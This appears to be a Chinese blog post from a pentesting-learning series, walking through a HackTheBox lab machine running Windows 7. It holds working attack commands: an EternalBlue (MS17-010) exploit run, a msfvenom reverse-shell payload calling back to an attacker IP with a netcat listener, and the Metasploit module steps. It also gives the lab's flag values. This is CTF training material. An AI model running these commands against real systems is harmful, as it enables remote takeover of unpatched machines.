iT邦幫忙

2021 iThome 鐵人賽

DAY 22
1

Recon

  • Rustscan
  • nmap
    • nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 10.129.209.90
    • 系統版本
      • Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
  • smb
  • nmapAutomator

Exploit

  • https://github.com/helviojunior/MS17-010
    • 修改 send_and_execute.py 裡面的 username
      • 等於 guest
  • MSF 準備 shell
    • msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe -o shellx64.exe
      • 其實這邊用 x86 也可以
  • 執行 Exploit
    • python send_and_execute.py 10.129.216.62 ../shellx64.exe
  • nc 收 shell
  • 理論上這樣就結束ㄌ
    • 但覺得今天這樣有一點太水 QQ,我們試用 msf 看看ㄅ

MSF Exploit

  • msfconsole
  • use windows/smb/ms17_010_eternalblue
  • options
  • set RHOSTS 10.129.216.62
  • set LHOST 10.10.16.35
  • run
  • Get Root Key
    • ff548eb71e920ff6c08843ce9df4e717
  • Get User Key
    • 4c546aea7dbee75cbd71de245c8deea9

上一篇
[Day21] HTB Archetype
下一篇
[Day23] HTB Buff
系列文
我想學滲透測試喵喵喵喵!!!!30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言